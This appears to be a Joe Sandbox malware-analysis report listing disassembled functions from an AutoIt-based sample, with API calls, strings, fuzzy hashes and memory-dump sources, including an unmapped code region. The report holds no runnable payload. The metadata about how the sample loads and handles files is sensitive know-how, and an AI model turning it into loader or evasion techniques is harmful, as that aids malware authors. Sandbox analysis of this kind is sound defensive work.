String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 78b0e4e46c32198895150ff3ea7922c4e15ab0f07eebe53aa0cf4209e480f99c
Instruction ID: 794af5170c30ac407c3704ff979b9f6e82cc7878b2044d79238865679f7e5855
Opcode Fuzzy Hash: 78b0e4e46c32198895150ff3ea7922c4e15ab0f07eebe53aa0cf4209e480f99c
Instruction Fuzzy Hash: B4115A75204741BFD7218B65DCA8F677BBDEBC9B11F208169F51A8A260DB61EC00E660

Uniqueness

Uniqueness Score: -1.00%

Function 009C4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0099E7C1), ref: 009C46A6
FindFirstFileW.KERNELBASE(?,?), ref: 009C46B7
FindClose.KERNEL32(00000000), ref: 009C46C7

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: e899de5eaeca55b0f366d6897d68df5dd6f9541e44f87d443a217565015a93f0
Instruction ID: be3ff9723e988101f0576a8788431f0ddbc7c3dbf6abe33b1ee995847c847482
Opcode Fuzzy Hash: e899de5eaeca55b0f366d6897d68df5dd6f9541e44f87d443a217565015a93f0
Instruction Fuzzy Hash: C8E02032D245009B52106738ECADCEA775CDE06375F10071BF935C11E0E7B05D5095D7

Uniqueness

Uniqueness Score: -1.00%

Function 0096E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009A428C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 3ec5f5e2e81cdb9e0e5316a91403a7f633328ad96e0513807507f25d73d6b0b7
Instruction ID: 679d02a466364d6d8c17c58524a73ef0d5a94221cc1b4b6f3024569bbfd59d5a
Opcode Fuzzy Hash: 3ec5f5e2e81cdb9e0e5316a91403a7f633328ad96e0513807507f25d73d6b0b7
Instruction Fuzzy Hash: 38A2AE78A04205CFCB24CF98C890BAEB7B5FF99300F648469E916AB351D775ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00970B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00970BBB
timeGetTime.WINMM ref: 00970E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00970FB3
TranslateMessage.USER32(?), ref: 00970FC7
DispatchMessageW.USER32(?), ref: 00970FD5
Sleep.KERNEL32(0000000A), ref: 00970FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0097105A
DestroyWindow.USER32 ref: 00971066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00971080
Sleep.KERNEL32(0000000A,?,?), ref: 009A52AD
TranslateMessage.USER32(?), ref: 009A608A
DispatchMessageW.USER32(?), ref: 009A6098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009A60AC

Strings

@GUI_WINHANDLE, xrefs: 009A53B9
@TRAY_ID, xrefs: 009A5BB9
@GUI_CTRLID, xrefs: 009A5364
@GUI_CTRLHANDLE, xrefs: 009A540E
@COM_EVENTOBJ, xrefs: 009A591A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 54f6be3239b9f093f00bf8a0751d711457736f67e8c1ce13106f1003c612f79d
Instruction ID: 76a8366d3a7fb4ad7d1e1dfc936fdc00261b08a33f4c2320229d1e9d6019100d
Opcode Fuzzy Hash: 54f6be3239b9f093f00bf8a0751d711457736f67e8c1ce13106f1003c612f79d
Instruction Fuzzy Hash: 97B2CE71608741DFD724DF24C894BAEBBE8BF85304F15891DF48A872A1DB74E885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009C93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009C91E9: __time64.LIBCMT ref: 009C91F3

Part of subcall function 00965045: _fseek.LIBCMT ref: 0096505D

__wsplitpath.LIBCMT ref: 009C94BE

Part of subcall function 0098432E: __wsplitpath_helper.LIBCMT ref: 0098436E

_wcscpy.LIBCMT ref: 009C94D1
_wcscat.LIBCMT ref: 009C94E4
__wsplitpath.LIBCMT ref: 009C9509
_wcscat.LIBCMT ref: 009C951F
_wcscat.LIBCMT ref: 009C9532

Part of subcall function 009C922F: _memmove.LIBCMT ref: 009C9268
Part of subcall function 009C922F: _memmove.LIBCMT ref: 009C9277

_wcscmp.LIBCMT ref: 009C9479

Part of subcall function 009C99BE: _wcscmp.LIBCMT ref: 009C9AAE
Part of subcall function 009C99BE: _wcscmp.LIBCMT ref: 009C9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009C96DC
_wcsncpy.LIBCMT ref: 009C974F
DeleteFileW.KERNEL32(?,?), ref: 009C9785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009C979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009C97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009C97BE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 245a8dace7deaeb5fc2c81ea528f24c74e4c1a08e997fe5cd944169b7fd40841
Instruction ID: 53626f4665e9cf69a1a84cb5f387a79c11fa1f96807d1bace7dc60fce44e43b6
Opcode Fuzzy Hash: 245a8dace7deaeb5fc2c81ea528f24c74e4c1a08e997fe5cd944169b7fd40841
Instruction Fuzzy Hash: EFC12CB1D00229AADF21DF94CD85FDEB7BDAF85300F0040AAF609E7251DB309A448F65

Uniqueness

Uniqueness Score: -1.00%

Function 00963015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00963074
RegisterClassExW.USER32(00000030), ref: 0096309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009630AF
InitCommonControlsEx.COMCTL32(?), ref: 009630CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009630DC
LoadIconW.USER32(000000A9), ref: 009630F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00963101

Strings

TaskbarCreated, xrefs: 009630A4
0, xrefs: 00963056
AutoIt v3 GUI, xrefs: 00963090
+, xrefs: 0096305D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b4651a4cb8805f168e2e64ffc5e341c888982b7c1bd541d6124b9c76de967dbe
Instruction ID: 86722a7bf46f6f4c110a92988d11e112ca83dd95aa0cf28f63921e26ed09ac97
Opcode Fuzzy Hash: b4651a4cb8805f168e2e64ffc5e341c888982b7c1bd541d6124b9c76de967dbe
Instruction Fuzzy Hash: 5E314BB1956389EFDB51CFE8D895AD9BBF0FB08310F10452AE580EA2A0D3B50986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00963041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00963074
RegisterClassExW.USER32(00000030), ref: 0096309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009630AF
InitCommonControlsEx.COMCTL32(?), ref: 009630CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009630DC
LoadIconW.USER32(000000A9), ref: 009630F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00963101

Strings

TaskbarCreated, xrefs: 009630A4
0, xrefs: 00963056
AutoIt v3 GUI, xrefs: 00963090
+, xrefs: 0096305D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 48c1c3913df7a114d5637e443a5e990cea52d65d7ec65f7e8cab3f9691b53c74
Instruction ID: d74fd07d264ebb7025d4f6dfd5dbf8624ba7b65689910873f294843cedb9274a
Opcode Fuzzy Hash: 48c1c3913df7a114d5637e443a5e990cea52d65d7ec65f7e8cab3f9691b53c74
Instruction Fuzzy Hash: AD21C8B1D16258EFDB10DFD8E899BDDBBF4FB08701F00412AF510AA2A0D7B149459F91

Uniqueness

Uniqueness Score: -1.00%

Function 009671EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00964864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A262F8,?,009637C0,?), ref: 00964882

Part of subcall function 0098074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009672C5), ref: 00980771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00967308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0099ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0099ED32
RegCloseKey.ADVAPI32(?), ref: 0099ED70
_wcscat.LIBCMT ref: 0099EDC9

Strings

\Include\, xrefs: 009672C5
\, xrefs: 0099EDEC
Software\AutoIt v3\AutoIt, xrefs: 009672FE
Include, xrefs: 0099ECE8, 0099ED29

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 39d626d975ecd02e7eb7c2d5a7d38ba6ee24dcff481845bd371b5ad2834e0b85
Instruction ID: 12492bdbd87d9471772ae518f9dd0f3b304df3a38e8a0a741b7f2b28f9efc234
Opcode Fuzzy Hash: 39d626d975ecd02e7eb7c2d5a7d38ba6ee24dcff481845bd371b5ad2834e0b85
Instruction Fuzzy Hash: 6B712C71409301DAC724EFA9EC91AAFB7E8BF98740F44453EF445872A1EB709A4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00963A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00963A62
LoadCursorW.USER32(00000000,00007F00), ref: 00963A71
LoadIconW.USER32(00000063), ref: 00963A88
LoadIconW.USER32(000000A4), ref: 00963A9A
LoadIconW.USER32(000000A2), ref: 00963AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00963AD2
RegisterClassExW.USER32(?), ref: 00963B28

Part of subcall function 00963041: GetSysColorBrush.USER32(0000000F), ref: 00963074
Part of subcall function 00963041: RegisterClassExW.USER32(00000030), ref: 0096309E
Part of subcall function 00963041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009630AF
Part of subcall function 00963041: InitCommonControlsEx.COMCTL32(?), ref: 009630CC
Part of subcall function 00963041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009630DC
Part of subcall function 00963041: LoadIconW.USER32(000000A9), ref: 009630F2
Part of subcall function 00963041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00963101

Strings

0, xrefs: 00963B06
AutoIt v3, xrefs: 00963B17
#, xrefs: 00963B0D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: b5ef091dd3072179955252666ad858bbb5e6a8bb96c8d22fe387793542f31554
Instruction ID: 6b505730e4cd740339db2ae6fff0ef55ed4316d941a3ce8f422adec9ad2c929e
Opcode Fuzzy Hash: b5ef091dd3072179955252666ad858bbb5e6a8bb96c8d22fe387793542f31554
Instruction Fuzzy Hash: 43213CB0D12304EFEB21DFE8EC49BED7BB4EB08711F00413AE504A62A0D3B65A569F44

Uniqueness

Uniqueness Score: -1.00%

Function 00963633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 009636D2
KillTimer.USER32(?,00000001), ref: 009636FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0096371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0096372A
CreatePopupMenu.USER32 ref: 0096373E
PostQuitMessage.USER32(00000000), ref: 0096375F

Strings

TaskbarCreated, xrefs: 00963725

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5e13c4261e24c7a91d909c2d14a9abc6253207fee56747b23b69be1b4dc8691c
Instruction ID: b509beb5704de9738d95d81801f4b2e9f17295ca07c17b78bbbd869b2d7afc0f
Opcode Fuzzy Hash: 5e13c4261e24c7a91d909c2d14a9abc6253207fee56747b23b69be1b4dc8691c
Instruction Fuzzy Hash: 41417CB2206145FBDF249F7CED8ABBD375DEB50300F088539F5028A2A1CA759E029371

Uniqueness

Uniqueness Score: -1.00%

Function 00963778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3OutputDebug, xrefs: 009638A4
CMDLINE, xrefs: 00963834
CMDLINERAW, xrefs: 0096380D
/ErrorStdOut, xrefs: 0096388F
/AutoIt3ExecuteScript, xrefs: 009638CE
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 009637C0
/AutoIt3ExecuteLine, xrefs: 009638B9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 34312d88c9e2dc35d245cd290c9ab67df52e0e03ceff2add7b238b23bc23d99d
Instruction ID: 29058163749f952408d43086576989688378ebc9397cf2a91b0c35a719a14fb8
Opcode Fuzzy Hash: 34312d88c9e2dc35d245cd290c9ab67df52e0e03ceff2add7b238b23bc23d99d
Instruction Fuzzy Hash: 91A17D71C10229AACF05EBE4CC91FEEB778BF94300F44442AF412A7191EF75AA09CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03E92640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03E92711
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03E92937

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: 7c04d84fa36911d2741371dde3466319715d50d72f26df2a0715029f42b9e355
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: FAA1F874E0020DEBEF14CFA4C894BEEB7B5BF48304F14969AE615BB280D7759A41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 009639E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00963A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00963A36
ShowWindow.USER32(00000000,?,?), ref: 00963A4A
ShowWindow.USER32(00000000,?,?), ref: 00963A53

Strings

AutoIt v3, xrefs: 00963A0D, 00963A12, 00963A13
edit, xrefs: 00963A30

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7ae2e83789843782c072a643719ebe4cb996e8ac490a57480f39d40bce3c5879
Instruction ID: 91a1422545dbe087d54c29ee7812ec19044b9f646b386f978df66ad3aee930a5
Opcode Fuzzy Hash: 7ae2e83789843782c072a643719ebe4cb996e8ac490a57480f39d40bce3c5879
Instruction Fuzzy Hash: 67F03A70A02290FEEA3197AB6C58EB72E7DD7C6F50B00003AB900A6170C2B60C43DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 03E92410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03E92300: Sleep.KERNELBASE(000001F4), ref: 03E92311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03E9252E

Strings

ELFPRPTHIOMEL, xrefs: 03E92591, 03E92594

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID: CreateFileSleep
String ID: ELFPRPTHIOMEL
API String ID: 2694422964-1022873095
Opcode ID: c4d3f766a97e364e813bc83d9b9b903231b09f262719911b1719fffaf98369de
Instruction ID: bb92f75a16b4389cef29b745ee020c53c5c178977e773d6dd8a158ac3f6cf4c8
Opcode Fuzzy Hash: c4d3f766a97e364e813bc83d9b9b903231b09f262719911b1719fffaf98369de
Instruction Fuzzy Hash: 1B515D75D0424DEBEF11DBA4C855BEEBB79AF08300F004699E609BB2C0D6795B44CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0096410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0099D5EC

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

_memset.LIBCMT ref: 0096418D
_wcscpy.LIBCMT ref: 009641E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009641F1

Strings

Line: , xrefs: 0099D615

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 6fadf8aca7aa020bac75e91bd769acf9d4e2a30e40fe2a10c0de3de05fbb9079
Instruction ID: ed506db44ff14e1a6f19fe938b9b423fe11da0c5a32cf0a64541bcd240d1631e
Opcode Fuzzy Hash: 6fadf8aca7aa020bac75e91bd769acf9d4e2a30e40fe2a10c0de3de05fbb9079
Instruction Fuzzy Hash: 4D31E47140D304AAD731EBA4DC45FEBB7ECAF95304F10492AF194920A1EB749A49C793

Uniqueness

Uniqueness Score: -1.00%

Function 0098564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 009856AB
_memcpy_s.LIBCMT ref: 0098571D
__read_nolock.LIBCMT ref: 0098577B
__filbuf.LIBCMT ref: 0098579E
_memset.LIBCMT ref: 009857E2

Part of subcall function 00988D68: __getptd_noexit.LIBCMT ref: 00988D68

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
